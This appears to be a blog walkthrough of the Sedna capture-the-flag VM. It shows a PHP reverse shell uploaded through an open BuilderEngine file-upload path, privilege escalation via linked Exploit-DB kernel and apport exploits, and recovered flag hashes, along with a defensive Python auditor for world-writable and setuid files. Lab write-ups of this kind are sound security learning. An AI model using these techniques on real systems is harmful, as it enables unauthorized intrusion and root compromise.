<a href="https://1.bp.blogspot.com/-S7VKNa79LLw/WMudy-sNyDI/AAAAAAAAKV4/OCeacapiXjsHA67fhxNyJw7LVoDmvCYhgCLcB/s1600/sedna_limitedShell_Exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://1.bp.blogspot.com/-S7VKNa79LLw/WMudy-sNyDI/AAAAAAAAKV4/OCeacapiXjsHA67fhxNyJw7LVoDmvCYhgCLcB/s320/sedna_limitedShell_Exploit.png" width="320" /></a></div>
<br />
<br />
It seems BuilderEngine is vulnerable to arbitrary file uploads in the directory:<br />
http://IP_Addr/themes/dashboard/assets/plugins/jquery-file-upload/server/php/<br />
<br />
I uploaded a simple PHP reverse shell to receive a reverse shell on listening port 443.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Y-JkPRVbYb0/WMudqwE36nI/AAAAAAAAKV8/pDIDUQvDQawgRkXtQfHLV6oyphAmxpbjQCEw/s1600/sedna_php_upload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://3.bp.blogspot.com/-Y-JkPRVbYb0/WMudqwE36nI/AAAAAAAAKV8/pDIDUQvDQawgRkXtQfHLV6oyphAmxpbjQCEw/s320/sedna_php_upload.png" width="281" /></a></div>
<br />
<br />
And I got the limited shell:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-czTgsxRtvoQ/WMufIpvTkwI/AAAAAAAAKWE/23YECAzci0Q21wHgbYleG1H3UxQ-83zJwCLcB/s1600/limited_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="62" src="https://4.bp.blogspot.com/-czTgsxRtvoQ/WMufIpvTkwI/AAAAAAAAKWE/23YECAzci0Q21wHgbYleG1H3UxQ-83zJwCLcB/s320/limited_shell.png" width="320" /></a></div>
<br />
<br />
And the first flag :D<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-FOIyUIAMFH8/WMue5NHVvrI/AAAAAAAAKWA/Jv2XGR53qsMQZ6x1EhlmNN_keHb92Pv4ACLcB/s1600/sedna_flag1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="92" src="https://3.bp.blogspot.com/-FOIyUIAMFH8/WMue5NHVvrI/AAAAAAAAKWA/Jv2XGR53qsMQZ6x1EhlmNN_keHb92Pv4ACLcB/s320/sedna_flag1.png" width="320" /></a></div>
<br />
/var/html<br />
cat flag.txt<br />
bfbb7e6e6e88d9ae66848b9aeac6b289<br />
<br />
Privilege Escalation:<br />
<br />
Looking at the world-writable files, it became very clear:<br />
<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/systemd/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/hugetlb/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/perf_event/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/blkio/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/freezer/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/devices/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/memory/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/cpuacct/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/cpu/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/cpuset/cgroup.event_control<br />
-rw-rw-rw- 1 root root 0 Mar 16 11:09 /sys/kernel/security/apparmor/.access<br />
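<br />
The listing above (and the setuid bit on exim in the Pluck post) is exactly what a walk over the filesystem checking permission bits turns up, and it is the same check an administrator should run before an attacker does. As an added example that is not from either VM or from the post, the following Python walks a tree and reports world-writable and setuid/setgid regular files; the demo builds a throwaway directory with constructed names (.access, exim4, harmless) that mirror the findings above.<br />

```python
import os
import stat
import tempfile


def audit_tree(root: str) -> dict:
    """Walk `root` and collect regular files that are world-writable or carry setuid/setgid.
    Symlinks and special files are skipped (lstat), so a link to a privileged binary is not
    reported a second time. Returns sorted paths relative to root under the keys
    world_writable, setuid and setgid."""
    findings = {"world_writable": [], "setuid": [], "setgid": []}
    for dirpath, _subdirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:          # vanished or unreadable entry: skip, do not abort the audit
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            rel = os.path.relpath(path, root)
            if st.st_mode & stat.S_IWOTH:
                findings["world_writable"].append(rel)
            if st.st_mode & stat.S_ISUID:
                findings["setuid"].append(rel)
            if st.st_mode & stat.S_ISGID:
                findings["setgid"].append(rel)
    for key in findings:
        findings[key].sort()
    return findings


def demo() -> dict:
    """Build a constructed tree that mirrors the post's findings and audit it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "sys", "kernel", "security", "apparmor"))
        os.makedirs(os.path.join(root, "usr", "sbin"))
        world_writable = os.path.join(root, "sys", "kernel", "security", "apparmor", ".access")
        setuid_binary = os.path.join(root, "usr", "sbin", "exim4")
        ordinary = os.path.join(root, "usr", "sbin", "harmless")
        for path in (world_writable, setuid_binary, ordinary):
            open(path, "wb").close()
        os.chmod(world_writable, 0o666)   # -rw-rw-rw-, as in the listing above
        os.chmod(setuid_binary, 0o4755)   # -rwsr-xr-x, the exim finding from the Pluck post
        os.chmod(ordinary, 0o755)         # a normal binary, must not be reported
        return audit_tree(root)


if __name__ == "__main__":
    for key, paths in demo().items():
        print(f"{key}: {paths}")
```

Run against a real root the output is a baseline: diff it against the previous run and anything new in the setuid list or under a system directory in the world-writable list is worth a look before it becomes someone's privilege escalation.<br />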
<div>
<br /></div>
<div>
AppArmor was writable.</div>
<div>
<br /></div>
<div>
So, taking a clue from that, I first tried the overlayfs local exploit as it involves using the AppArmor directory.</div>
<div>
<br /></div>
<div>
https://www.exploit-db.com/exploits/37292/</div>
<div>
<br /></div>
<div>
The exploit matched exactly with the kernel version and the release.</div>
<div>
<br /></div>
<div>
Running the exploit, it gave its output from all the fprintf statements, but it failed.</div>
Checking the C code, it seems there is no "su" file in /bin by default!<br />
<br />
At this stage, I enumerated further on the misconfigurations side, but I could not find much, so ...<br />
<br />
So I went back to check more exploits for the kernel and the OS release.<br />
<br />
The OS, being 14.04, has another matching exploit:<br />
<br />
https://www.exploit-db.com/exploits/36746/<br />
<br />
For 14.04, the apport exploit worked just fine and a root shell was achieved.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-cyup4kocWDc/WMuhBPuv-ZI/AAAAAAAAKWQ/KoLQksdXqqUWwNbfZoHwwyzXU_l0bTi0wCLcB/s1600/sedna_flag2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="95" src="https://2.bp.blogspot.com/-cyup4kocWDc/WMuhBPuv-ZI/AAAAAAAAKWQ/KoLQksdXqqUWwNbfZoHwwyzXU_l0bTi0wCLcB/s320/sedna_flag2.png" width="320" /></a></div>
<br />
And the next flag!<br />
<br />
/root<br />
cat flag.txt<br />
a10828bee17db751de4b936614558305<br />
<br />
There are two more flags; I am lazy so I am going to skip those in this walkthrough...<br />
(Maybe I will do that later...) :D</div>
Angkan, http://www.blogger.com/profile/18370393056318837500